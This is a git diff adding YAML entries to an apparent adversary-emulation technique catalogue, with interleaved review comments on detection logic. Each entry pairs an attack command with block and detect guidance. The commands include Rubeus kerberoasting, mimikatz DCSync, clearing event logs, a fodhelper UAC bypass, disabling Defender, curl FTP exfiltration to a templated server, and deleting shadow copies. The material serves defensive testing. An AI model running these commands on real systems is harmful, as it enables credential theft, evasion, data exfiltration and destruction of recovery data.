@@ -0,0 +1,20 @@ +name: Volumetric Kerberoasting +description: Retrieve Kerberos TGS tickets from Active Directory for all users with service principal names (SPNs) set +platforms: +guidance: +- cmd> Rubeus.exe kerberoast +block: +- '' +detect: +- 'Configure Advanced Audit for Kerberos operations on domain controllers via Group Policy. Using ticket request logs (Event ID 4769), detect suspicious ticket request operations using one or more of the following strategies: 1) Look for a high volume of ticket requests or unique service principals in a short period of time as compared to the typical number of requests by that source. 2) Configure a honey account with a service principal name set then alert when any ticket is requested for that SPN (this requires first configuring a SACL on the account as well as directory service object access auditing via Advanced Audit). 3) Look for downgraded encryption requests where the requested ticket uses RC4 while the target object uses AES (Note: in cases where the account has a weak password, AES tickets can be cracked in a realistic timeframe so attacks may request AES tickets).' +controls: +- SIEM +- Identity Threat Protection +metadata: + id: c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7 + tid: T1558.003 + tactic: TA0006 + x_tools: + - https://github.com/GhostPack/Rubeus + x_vectr_id: c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7 + isv: 1 diff --git a/rh-index-2024/techniques/CredentialAccess/d6dd145b-c7ae-4f79-bc07-179a012a7a07.yml b/rh-index-2024/techniques/CredentialAccess/d6dd145b-c7ae-4f79-bc07-179a012a7a07.yml new file mode 100644 index 0000000..76795bc --- /dev/null +++ b/rh-index-2024/techniques/CredentialAccess/d6dd145b-c7ae-4f79-bc07-179a012a7a07.yml 
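Review bot: `block:` holds a single empty string (`- ''`), which renders as a blank bullet and tells a reader nothing, yet there are real preventive controls for Kerberoasting that belong here, such as `Use group-managed service accounts or long random passwords for SPN-bearing accounts and enforce AES-only Kerberos encryption on them`, with `Hardening` added to `controls`. `platforms:` is also null here although the guidance is Windows/AD-specific. Minor typo in the detect text: `so attacks may request AES tickets` → `so attackers may request AES tickets`.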
@@ -0,0 +1,20 @@ +name: Extract domain user credentials via replication +description: Replicate a user's hash from a domain controller using replication APIs (DCSync). +platforms: +- windows +guidance: +- (from workstation) mimikatz> lsadump::dcsync /domain:{{ domain }} /user:{{ user }} +block: +- '' +detect: +- Enable object logging for directory services via Group Policy Advanced Audit then alert when non-domin controller sources replicate directory objects. Specifically, look for Event ID 4662 events where the action performed was related to replicating object changes (e.g. either/both of "Replicating Directory Changes all" and "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"/"{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}") +- https://blog.blacklanternsecurity.com/p/detecting-dcsync +controls: +- SIEM +- Identity Threat Protection +metadata: + id: d6dd145b-c7ae-4f79-bc07-179a012a7a07 + tid: T1003.006 + tactic: TA0006 + x_vectr_id: d6dd145b-c7ae-4f79-bc07-179a012a7a07 + isv: 1 diff --git a/rh-index-2024/techniques/DefenseEvasion/16ed92a3-b979-464b-bc79-fadb43e3c6a1.yml b/rh-index-2024/techniques/DefenseEvasion/16ed92a3-b979-464b-bc79-fadb43e3c6a1.yml new file mode 100644 index 0000000..8950dd0 --- /dev/null +++ b/rh-index-2024/techniques/DefenseEvasion/16ed92a3-b979-464b-bc79-fadb43e3c6a1.yml 
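Review bot: The detect entry lists the same GUID twice (`"{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"/"{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"`), so the "either/both" wording actually points at a single extended right; the second value was presumably meant to be the DS-Replication-Get-Changes-All right, which if I recall correctly is `1131f6ad-9c07-11d1-f79f-00c04fc2dcd2`, but please verify against the schema before changing it. A rule that matches only one GUID will miss 4662 events that report the other right. Typo in the same line: `non-domin controller` → `non-domain controller`. The bare URL as a `detect` list item is inconsistent with 8c06191e, which puts links under `metadata.x_references`; moving it there keeps `detect:` a list of gradeable statements.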
@@ -0,0 +1,22 @@ +name: Clear Windows Event Log entries +description: Clear the Windows Event Log entries using the builtin wevtutil.exe to remove any attack indicators in the logs. +platforms: +- windows +guidance: +- CMD> wevtutil clear-log Security +- CMD> wevtutil clear-log Application +- CMD> wevtutil clear-log System +block: +- Suspicious process execution/behavior blocked by endpoint security tool +detect: +- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry +- Suspicious Windows Event Log deletion is detected in the SIEM using Event Log events (Event ID 1102) +controls: +- Endpoint Protection +- SIEM +metadata: + id: 16ed92a3-b979-464b-bc79-fadb43e3c6a1 + tid: T1070.001 + tactic: TA0005 + x_vectr_id: 16ed92a3-b979-464b-bc79-fadb43e3c6a1 + isv: 1 diff --git a/rh-index-2024/techniques/DefenseEvasion/2496e250-5757-482f-9661-daea872395ae.yml b/rh-index-2024/techniques/DefenseEvasion/2496e250-5757-482f-9661-daea872395ae.yml new file mode 100644 index 0000000..1194713 --- /dev/null +++ b/rh-index-2024/techniques/DefenseEvasion/2496e250-5757-482f-9661-daea872395ae.yml 
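Review bot: The detect entry relies on Event ID 1102, but 1102 is only written when the Security log is cleared; the `wevtutil clear-log Application` and `clear-log System` steps in the guidance are recorded as Event ID 104 (Log clear) in the System log instead, so the rule as written misses two of the three commands. I'd change the line to `Suspicious Windows Event Log deletion is detected in the SIEM using Event ID 1102 (Security log cleared) and Event ID 104 (System/Application log cleared)`. Since the point of the technique is to destroy local evidence, it is also worth stating that the SIEM must be receiving forwarded events in near-real time, otherwise the clear removes the only copy.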
@@ -0,0 +1,20 @@ +name: Sideload a DLL into a legitimate application +description: Rename an attacker-controlled DLL to the name of a DLL expected by a legitimate application, move that DLL to be adjacent to the application, then execute the application in order to trigger the loading of the DLL by the legitimate application. +platforms: +- windows +guidance: +- "CMD>\ncopy {{ application }} .\nmove {{ dll }} {{ expected_dll }}\n{{ application }}" +block: +- Suspicious process execution/behavior blocked by endpoint security tool +detect: +- Suspicious process execution/behavior detected by endpoint security tool +- Using image load telemetry, alert on DLLs stored on-disk at unexpected locations (e.g. a DLL expected to be in System32 being loaded from a temp folder) +controls: +- Endpoint Protection +- SIEM +metadata: + id: 2496e250-5757-482f-9661-daea872395ae + tid: T1574.002 + tactic: TA0005 + x_vectr_id: 2496e250-5757-482f-9661-daea872395ae + isv: 1 diff --git a/rh-index-2024/techniques/DefenseEvasion/327db68c-178b-4e3c-8f2d-12d91bc49fe0.yml b/rh-index-2024/techniques/DefenseEvasion/327db68c-178b-4e3c-8f2d-12d91bc49fe0.yml new file mode 100644 index 0000000..bc14660 --- /dev/null +++ b/rh-index-2024/techniques/DefenseEvasion/327db68c-178b-4e3c-8f2d-12d91bc49fe0.yml 
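Review bot: The second detect entry names "image load telemetry" but only the path heuristic, which the guidance itself defeats by placing the DLL next to the copied application rather than in a temp folder. The stronger signal for this exact scenario is signature mismatch: `Using image load telemetry (e.g. Sysmon Event ID 7), alert when a signed application loads a DLL that is unsigned or signed by a different publisher than the host image, or loads from a user-writable directory`. That catches the `move {{ dll }} {{ expected_dll }}` step regardless of where the pair is staged.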
@@ -0,0 +1,22 @@
+name: Load known-abusable kernel driver
+description: Load a legitimate and signed kernel driver that is vulnerable to exploitation. Refer to projects like KDU (https://github.com/hfiref0x/KDU/) for potential vulnerable drivers to use. Vulnerable, signed drivers provide a privileged (kernel) execution mechanism to attackers, allowing them to bypass security controls they couldn't otherwise bypass, such as by killing protected processes.
+platforms:
+- windows
+guidance:
+- "(example) cmd> \nsc.exe create {{ name }} type= kernel start= demand error= normal binpath= c:\\windows\\System32\\Drivers\\{{ sys_file }} displayname= {{ name }}\nsc.exe start {{ name }}\n"
+block:
+- Use built-in Windows security features like HVCI and WDAC to block loading of drivers based on hash and/or signature characteristics.
+- https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules
+- https://www.loldrivers.io/
+- Anomalous driver load blocked by endpoint security tool
+detect:
+- Anomalous driver load detected by endpoint security tool or in the SIEM via telemetry data, such as Sysmon ID 6
+controls:
+- Hardening
+- Endpoint Protection
+metadata:
+ id: 327db68c-178b-4e3c-8f2d-12d91bc49fe0
+ tid: T1014
+ tactic: TA0005
+ x_vectr_id: 327db68c-178b-4e3c-8f2d-12d91bc49fe0
+ isv: 1
diff --git a/rh-index-2024/techniques/DefenseEvasion/8c06191e-8c03-4b97-8c18-e28cde39fda5.yml b/rh-index-2024/techniques/DefenseEvasion/8c06191e-8c03-4b97-8c18-e28cde39fda5.yml
new file mode 100644
index 0000000..77a3868
--- /dev/null
+++ b/rh-index-2024/techniques/DefenseEvasion/8c06191e-8c03-4b97-8c18-e28cde39fda5.yml
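Review bot: The only detect entry depends on Sysmon ID 6, yet the guidance registers the driver as a service with `sc.exe create`, which produces a service-installation event regardless of whether Sysmon is deployed; listing it gives a fallback detection. Suggest adding `- New kernel service installation recorded as Event ID 7045 (System log) or 4697 (Security log) with a binpath under System32\Drivers for a driver not in the approved driver baseline`. Controls should probably also include SIEM, since the existing detect line already relies on SIEM telemetry.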
@@ -0,0 +1,25 @@
+name: Bypass User Account Control (UAC) via fodhelper
+description: Bypass user account control (UAC) to move to a high-integrity execution context via fodhelper.exe and a Registry modification
+platforms:
+- windows
+guidance:
+- cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /f
+- cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "C:\windows\system32\cmd.exe" /f
+- cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /d "" /f
+- cmd> c:\windows\system32\fodhelper.exe
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Suspicious Windows Registry access/modifications detected in the SIEM using telemetry (e.g. Windows Advanced Audit events, endpoint security tool logs)
+controls:
+- SIEM
+- Endpoint Protection
+metadata:
+ id: 8c06191e-8c03-4b97-8c18-e28cde39fda5
+ tid: T1548.002
+ tactic: TA0004
+ x_references:
+ - https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/
+ x_vectr_id: 8c06191e-8c03-4b97-8c18-e28cde39fda5
+ isv: 1
diff --git a/rh-index-2024/techniques/DefenseEvasion/940be4b6-6081-4808-ab64-aceadfeb3792.yml b/rh-index-2024/techniques/DefenseEvasion/940be4b6-6081-4808-ab64-aceadfeb3792.yml
new file mode 100644
index 0000000..9574d4f
--- /dev/null
+++ b/rh-index-2024/techniques/DefenseEvasion/940be4b6-6081-4808-ab64-aceadfeb3792.yml
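Review bot: The block list cites only the endpoint tool, but this bypass has two configuration preconditions that are preventive controls in their own right: the running user must already be a member of the local Administrators group, and UAC must be below the "Always notify" level for fodhelper.exe to auto-elevate silently. Suggest adding `- Standard users are not members of the local Administrators group, and UAC is set to "Always notify" so auto-elevating binaries still prompt` under block, with Hardening added to controls. On the detect side, the registry path in the guidance is the concrete indicator, so `- Creation of or value set on HKCU\Software\Classes\ms-settings\Shell\Open\command (e.g. Sysmon Event ID 12/13) by a non-installer process` is more actionable than the generic registry-modification line.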
@@ -0,0 +1,20 @@
+name: DLL execution using Rundll32
+description: Execute a malicious DLL's function directly using rundll32
+platforms:
+- windows
+guidance:
+- cmd> rundll32 {{ dll }},{{ export }} [{{ args }}]
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Payload on disk deleted/quarantined by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+ id: 940be4b6-6081-4808-ab64-aceadfeb3792
+ tid: T1218.011
+ tactic: TA0005
+ x_vectr_id: 940be4b6-6081-4808-ab64-aceadfeb3792
+ isv: 1
diff --git a/rh-index-2024/techniques/DefenseEvasion/9dbfedcf-893f-4086-b428-2f3bc73c96a5.yml b/rh-index-2024/techniques/DefenseEvasion/9dbfedcf-893f-4086-b428-2f3bc73c96a5.yml
new file mode 100644
index 0000000..0bd0c38
--- /dev/null
+++ b/rh-index-2024/techniques/DefenseEvasion/9dbfedcf-893f-4086-b428-2f3bc73c96a5.yml
@@ -0,0 +1,20 @@
+name: Certutil decode Base64 encoded payload
+description: Use certutil.exe to decode an encoded payload file
+platforms:
+- windows
+guidance:
+- cmd> certutil -decode {{ infile_name }} {{ outfile_name }}
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+ id: 9dbfedcf-893f-4086-b428-2f3bc73c96a5
+ tid: T1140
+ tactic: TA0005
+ x_vectr_id: 9dbfedcf-893f-4086-b428-2f3bc73c96a5
+ isv: 1
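Review bot: The rundll32 entry has a single generic detect line, while the `{{ dll }}` argument in the guidance is the concrete signal: rundll32 loading a DLL from a user-writable directory or an unsigned DLL is the anomaly a rule can match, and the SIEM listed under controls currently has nothing to key on. Suggest adding `- Process creation events (e.g. Event ID 4688 with command-line auditing) where rundll32.exe references a DLL outside System32/Program Files, or image-load telemetry showing rundll32 loading an unsigned DLL`. The certutil entry later in this line already shows the 4688 wording used elsewhere in the commit and could be mirrored here.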
diff --git a/rh-index-2024/techniques/DefenseEvasion/cb3ea139-979c-438a-9cf7-611b985f4d61.yml b/rh-index-2024/techniques/DefenseEvasion/cb3ea139-979c-438a-9cf7-611b985f4d61.yml
new file mode 100644
index 0000000..66ceb94
--- /dev/null
+++ b/rh-index-2024/techniques/DefenseEvasion/cb3ea139-979c-438a-9cf7-611b985f4d61.yml
@@ -0,0 +1,20 @@
+name: Disable Windows Defender via PowerShell
+description: Use PowerShell's Set-MpPreference to disable Windows Defender
+platforms:
+- windows
+guidance:
+- PS> Set-MpPreference -DisableBehaviorMonitoring $true
+- PS> Set-MpPreference -DisableRealtimeMonitoring $true
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- "Changes to Defender's running state are detected using Defender Event Log events (e.g. 5001 for being disabled, 5004 and 5007 for being changed; full list: https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus)"
+controls:
+- Endpoint Protection
+metadata:
+ id: cb3ea139-979c-438a-9cf7-611b985f4d61
+ tid: T1562.001
+ tactic: TA0005
+ x_vectr_id: cb3ea139-979c-438a-9cf7-611b985f4d61
+ isv: 1
diff --git a/rh-index-2024/techniques/DefenseEvasion/cbd9070f-03fa-455f-af46-99e8d41146ac.yml b/rh-index-2024/techniques/DefenseEvasion/cbd9070f-03fa-455f-af46-99e8d41146ac.yml
new file mode 100644
index 0000000..df9cb79
--- /dev/null
+++ b/rh-index-2024/techniques/DefenseEvasion/cbd9070f-03fa-455f-af46-99e8d41146ac.yml
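Review bot: The block entry should name Tamper Protection, the Defender feature that specifically rejects these Set-MpPreference changes, rather than the generic endpoint-tool line, with Hardening added to controls to match. Suggest `- Microsoft Defender Tamper Protection is enabled, so Set-MpPreference changes to real-time or behavior monitoring are rejected`. For detect, PowerShell script block logging (Event ID 4104) records the cmdlet invocation itself and complements the Defender operational events already listed; SIEM is also missing from controls even though the detect line depends on collected event logs.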
@@ -0,0 +1,16 @@
+name: Modify identity policy in IdP
+description: Modify an IdP policy to be more permissive for authentication. For example, disable an Azure AD conditional access policy's MFA requirement.
+platforms:
+guidance:
+block:
+- ''
+detect:
+- Monitor for policy modifications from IdP control plane telemetry and look for anomalous changes, such as those performed by unexpected principals or changes occuring outside of expected business processes
+controls:
+- SIEM
+metadata:
+ id: cbd9070f-03fa-455f-af46-99e8d41146ac
+ tid: T1484
+ tactic: TA0003
+ x_vectr_id: cbd9070f-03fa-455f-af46-99e8d41146ac
+ isv: 1
diff --git a/rh-index-2024/techniques/Discovery/3f120c23-78c0-462f-808f-38ef4f607233.yml b/rh-index-2024/techniques/Discovery/3f120c23-78c0-462f-808f-38ef4f607233.yml
new file mode 100644
index 0000000..dbf086a
--- /dev/null
+++ b/rh-index-2024/techniques/Discovery/3f120c23-78c0-462f-808f-38ef4f607233.yml
@@ -0,0 +1,24 @@
+name: Internal network scan using Net Scan
+description: Perform an internal network scan to discover other hosts and services on the internal network using Network Scanner by SoftPerfect
+platforms:
+- windows
+guidance:
+- cmd> {{ netscan_binary }}
+block:
+- Network security controls block source generating a large volume of connection requests
+- Block the installation and use of unapproved third-party utilities via application control software
+detect:
+- Network security controls or the SIEM detect a source generating a large volume of connection requests by network traffic logs like switch logs and flow logs
+controls:
+- ID/PS
+- Firewall
+- SIEM
+- Application Control
+metadata:
+ id: 3f120c23-78c0-462f-808f-38ef4f607233
+ tid: T1046
+ tactic: TA0007
+ x_tools:
+ - https://www.softperfect.com/products/networkscanner/
+ x_vectr_id: 3f120c23-78c0-462f-808f-38ef4f607233
+ isv: 1
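Review bot: In the IdP-policy hunk, `tactic: TA0003` (Persistence) does not match `tid: T1484`, which ATT&CK files under Defense Evasion and Privilege Escalation; the sibling `Modify group policy object` entry in this same commit uses TA0005 for T1484.001, so the two should agree. `occuring` in the detect line should read `occurring`. The block list is empty (`- ''`) although preventive controls exist for this technique; suggest `- Policy-modifying roles are restricted to dedicated admin accounts that require phishing-resistant MFA and just-in-time role activation`, with IdP added to controls.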
diff --git a/rh-index-2024/techniques/Discovery/4266c26e-0470-4b97-8dc3-1d24fe35f586.yml b/rh-index-2024/techniques/Discovery/4266c26e-0470-4b97-8dc3-1d24fe35f586.yml
new file mode 100644
index 0000000..751b34b
--- /dev/null
+++ b/rh-index-2024/techniques/Discovery/4266c26e-0470-4b97-8dc3-1d24fe35f586.yml
@@ -0,0 +1,20 @@
+name: Domain trust discovery via nltest
+description: Identify domain trust relationships using nltest.exe
+platforms:
+- windows
+guidance:
+- cmd> nltest.exe /domain_trusts /all_trusts
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+ id: 4266c26e-0470-4b97-8dc3-1d24fe35f586
+ tid: T1482
+ tactic: TA0007
+ x_vectr_id: 4266c26e-0470-4b97-8dc3-1d24fe35f586
+ isv: 1
diff --git a/rh-index-2024/techniques/Discovery/672f8861-c914-4f58-b861-5107ce19f61c.yml b/rh-index-2024/techniques/Discovery/672f8861-c914-4f58-b861-5107ce19f61c.yml
new file mode 100644
index 0000000..b1e1235
--- /dev/null
+++ b/rh-index-2024/techniques/Discovery/672f8861-c914-4f58-b861-5107ce19f61c.yml
@@ -0,0 +1,22 @@
+name: BloodHound DC enumeration
+description: Use BloodHound/SharpHound to perform enumeration of domain resources against a domain controller
+platforms:
+guidance:
+- cmd> SharpHound.exe -c DcOnly
+block:
+- ''
+detect:
+- Windows enumeration activities detected from large amount of network traffic (SMB, ARP, SAMR, etc) via UEBA-like or network monitoring tools
+- Enable object logging for directory services via Group Policy Advanced Audit then configure a SACL on Active Directory objects. Trigger an alert when multiple (high-value) objects are accessed by a single source in a short period using object access logs for the directory service objects (Evevnt ID 4656, 4663)
+- https://blog.blacklanternsecurity.com/p/detecting-ldap-recoannaissance
+controls:
+- SIEM
+- Identity Threat Protection
+metadata:
+ id: 672f8861-c914-4f58-b861-5107ce19f61c
+ tid: T1087.002
+ tactic: TA0007
+ x_tools:
+ - https://github.com/BloodHoundAD/SharpHound
+ x_vectr_id: 672f8861-c914-4f58-b861-5107ce19f61c
+ isv: 1
diff --git a/rh-index-2024/techniques/Discovery/7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2.yml b/rh-index-2024/techniques/Discovery/7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2.yml
new file mode 100644
index 0000000..0502f98
--- /dev/null
+++ b/rh-index-2024/techniques/Discovery/7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2.yml
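Review bot: `Evevnt ID` in the second detect line should be `Event ID`, and the IDs cited there are the generic object-access pair; SACL hits on Active Directory objects are logged under Directory Service Access as Event ID 4662, so `(Event ID 4662)` is what a SIEM rule for this test will actually match. The URL slug `detecting-ldap-recoannaissance` looks misspelled; verify that the link resolves before publishing. `platforms:` is empty although the guidance invokes `SharpHound.exe`, so `- windows` is presumably intended.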
@@ -0,0 +1,23 @@
+name: Enumerate domain groups and users using net
+description: Enumerate domain users and domain groups using the builtin net.exe
+platforms:
+- windows
+guidance:
+- cmd> net user /domain
+- cmd> net group /domain
+- cmd> net group "Domain Admins" /domain
+- cmd> net group "Domain Computers" /domain
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+ id: 7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2
+ tid: T1087.002
+ tactic: TA0007
+ x_vectr_id: 7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2
+ isv: 1
diff --git a/rh-index-2024/techniques/Discovery/9064e91a-be78-48a5-9112-28d5701d6d51.yml b/rh-index-2024/techniques/Discovery/9064e91a-be78-48a5-9112-28d5701d6d51.yml
new file mode 100644
index 0000000..1c91bac
--- /dev/null
+++ b/rh-index-2024/techniques/Discovery/9064e91a-be78-48a5-9112-28d5701d6d51.yml
@@ -0,0 +1,19 @@
+name: Retrieve system information
+description: Retrieve information about the system using multiple builtin commands
+platforms:
+- windows
+guidance:
+- CMD> systeminfo ipconfig tasklist sc query wmic product get
+block:
+- ''
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+ id: 9064e91a-be78-48a5-9112-28d5701d6d51
+ tid: T1082
+ tactic: TA0007
+ x_vectr_id: 9064e91a-be78-48a5-9112-28d5701d6d51
+ isv: 1
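Review bot: In the "Retrieve system information" hunk the guidance runs five separate commands together on one line (`systeminfo ipconfig tasklist sc query wmic product get`), which as written is a single command line that hands the rest as arguments to systeminfo. Other entries in this commit list one command per item, as the wevtutil entry does; suggest splitting into `- CMD> systeminfo`, `- CMD> ipconfig`, `- CMD> tasklist`, `- CMD> sc query`, `- CMD> wmic product get`. The detect line could then reuse the 4688 process-baseline wording from the net.exe entry earlier on this line, which is the telemetry that actually distinguishes a burst of these builtins from routine use.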
diff --git a/rh-index-2024/techniques/Discovery/bc85f11b-e481-4afb-a5f5-db26e5c07433.yml b/rh-index-2024/techniques/Discovery/bc85f11b-e481-4afb-a5f5-db26e5c07433.yml
new file mode 100644
index 0000000..e73f4ce
--- /dev/null
+++ b/rh-index-2024/techniques/Discovery/bc85f11b-e481-4afb-a5f5-db26e5c07433.yml
@@ -0,0 +1,20 @@
+name: Domain Controller discovery via nltest
+description: Use nltest.exe to identify domain controllers in the domain
+platforms:
+- windows
+guidance:
+- cmd> nltest.exe /dclist:{{ domain }}
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+ id: bc85f11b-e481-4afb-a5f5-db26e5c07433
+ tid: T1018
+ tactic: TA0007
+ x_vectr_id: bc85f11b-e481-4afb-a5f5-db26e5c07433
+ isv: 1
diff --git a/rh-index-2024/techniques/Execution/a7134d71-dc49-41a8-a309-ec520c96a089.yml b/rh-index-2024/techniques/Execution/a7134d71-dc49-41a8-a309-ec520c96a089.yml
new file mode 100644
index 0000000..867c552
--- /dev/null
+++ b/rh-index-2024/techniques/Execution/a7134d71-dc49-41a8-a309-ec520c96a089.yml
@@ -0,0 +1,22 @@
+name: Macro - Remote Template
+description: Execute a malicious Office document on the endpoint that will load a macro stored in a remote template document
+platforms:
+- windows
+guidance:
+block:
+- Macro execution is blocked by GPO policy
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Payload on disk deleted/quarantined by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Payload on disk triggers an alert with endpoint security tool
+controls:
+- Endpoint Protection
+- Hardening
+- SIEM
+metadata:
+ id: a7134d71-dc49-41a8-a309-ec520c96a089
+ tid: T1221
+ tactic: TA0005
+ x_vectr_id: a7134d71-dc49-41a8-a309-ec520c96a089
+ isv: 1
diff --git a/rh-index-2024/techniques/Exfiltration/11b7a86e-4596-4df9-a2a9-705096756d28.yml b/rh-index-2024/techniques/Exfiltration/11b7a86e-4596-4df9-a2a9-705096756d28.yml
new file mode 100644
index 0000000..fff885f
--- /dev/null
+++ b/rh-index-2024/techniques/Exfiltration/11b7a86e-4596-4df9-a2a9-705096756d28.yml
@@ -0,0 +1,20 @@
+name: Extract sensitive data over FTP
+description: Exfiltrate data from the internal network to an external system via FTP
+platforms:
+guidance:
+- https://dlptest.com/ftp-test/
+- shell> curl --ftp-create-dirs -T {{ local_file }} ftp://{{ username }}:{{ password }}@{{ server }}/{{ dest_path }}
+block:
+- Outbound connections over FTP are blocked by network security configurations
+- Sensitive data sent over the network is blocked by network DLP tool
+detect:
+- Sensitive data sent over the network is detected by network DLP tool
+controls:
+- DLP
+- Firewall
+metadata:
+ id: 11b7a86e-4596-4df9-a2a9-705096756d28
+ tid: T1048.003
+ tactic: TA0010
+ x_vectr_id: 11b7a86e-4596-4df9-a2a9-705096756d28
+ isv: 1
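Review bot: In the "Macro - Remote Template" hunk the detect list does not cover the defining behavior of the technique, an Office process fetching the template over the network before any macro runs; the two on-disk and process-behavior entries can both miss it because the delivered document contains no macro itself. Suggest adding `- Office application (e.g. winword.exe) initiating an outbound network connection (Sysmon Event ID 3 or proxy logs) to an external host shortly after a document is opened`. The file sits under Execution while `tactic: TA0005` is Defense Evasion; that matches where ATT&CK places T1221, so it is the folder placement that may be worth a second look.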
diff --git a/rh-index-2024/techniques/Exfiltration/7d63d9d1-0bb4-41b5-9fe2-785bad419860.yml b/rh-index-2024/techniques/Exfiltration/7d63d9d1-0bb4-41b5-9fe2-785bad419860.yml
new file mode 100644
index 0000000..77e983d
--- /dev/null
+++ b/rh-index-2024/techniques/Exfiltration/7d63d9d1-0bb4-41b5-9fe2-785bad419860.yml
@@ -0,0 +1,19 @@
+name: Extract sensitive data over HTTP
+description: Extract data from the network over HTTP tcp/80 to an external host or IP.
+platforms:
+guidance:
+- http://dlptest.com/http-post/
+block:
+- Sensitive data sent over the network is blocked by network DLP tool
+detect:
+- Sensitive data sent over the network is detected by network DLP tool
+controls:
+- Firewall
+- DLP
+- Web Gateway
+metadata:
+ id: 7d63d9d1-0bb4-41b5-9fe2-785bad419860
+ tid: T1048.003
+ tactic: TA0010
+ x_vectr_id: 7d63d9d1-0bb4-41b5-9fe2-785bad419860
+ isv: 1
diff --git a/rh-index-2024/techniques/Exfiltration/9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66.yml b/rh-index-2024/techniques/Exfiltration/9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66.yml
new file mode 100644
index 0000000..b807191
--- /dev/null
+++ b/rh-index-2024/techniques/Exfiltration/9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66.yml
@@ -0,0 +1,19 @@
+name: Extract data to cloud storage service
+description: Extract data from the internal network to a cloud storage service like MEGA, Google Drive, or Box
+platforms:
+guidance:
+block:
+- Sensitive data sent over the network is blocked by network DLP tool
+- Network security tool detects connection to domain based on category from proxy or DNS
+detect:
+- Sensitive data sent over the network is detected by network DLP tool
+controls:
+- Firewall
+- DLP
+- Web Gateway
+metadata:
+ id: 9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66
+ tid: T1567.002
+ tactic: TA0010
+ x_vectr_id: 9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66
+ isv: 1
diff --git a/rh-index-2024/techniques/Exfiltration/b48fa856-d004-4d5a-918f-d9429a9cd8e3.yml b/rh-index-2024/techniques/Exfiltration/b48fa856-d004-4d5a-918f-d9429a9cd8e3.yml
new file mode 100644
index 0000000..3c2f885
--- /dev/null
+++ b/rh-index-2024/techniques/Exfiltration/b48fa856-d004-4d5a-918f-d9429a9cd8e3.yml
@@ -0,0 +1,20 @@
+name: Extract sensitive data over HTTP C2
+description: Extract data from the network via an HTTP C2 channel over tcp/80 to external host or IP
+platforms:
+guidance:
+- implant> download {{ file }}
+block:
+- Sensitive data sent over the network is blocked by network DLP tool
+- C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool
+detect:
+- C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool
+controls:
+- Firewall
+- DLP
+- Web Gateway
+metadata:
+ id: b48fa856-d004-4d5a-918f-d9429a9cd8e3
+ tid: T1041
+ tactic: TA0010
+ x_vectr_id: b48fa856-d004-4d5a-918f-d9429a9cd8e3
+ isv: 1
diff --git a/rh-index-2024/techniques/Impact/31d4a02d-4a66-4740-a9c4-8814319fd5c4.yml b/rh-index-2024/techniques/Impact/31d4a02d-4a66-4740-a9c4-8814319fd5c4.yml
new file mode 100644
index 0000000..2dbf5f4
--- /dev/null
+++ b/rh-index-2024/techniques/Impact/31d4a02d-4a66-4740-a9c4-8814319fd5c4.yml
@@ -0,0 +1,20 @@
+name: Delete shadows with vssadmin.exe
+description: Delete volume shadow copies on the host to inhibit file system recovery
+platforms:
+- windows
+guidance:
+- CMD> vssadmin.exe delete shadows /all /quiet
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
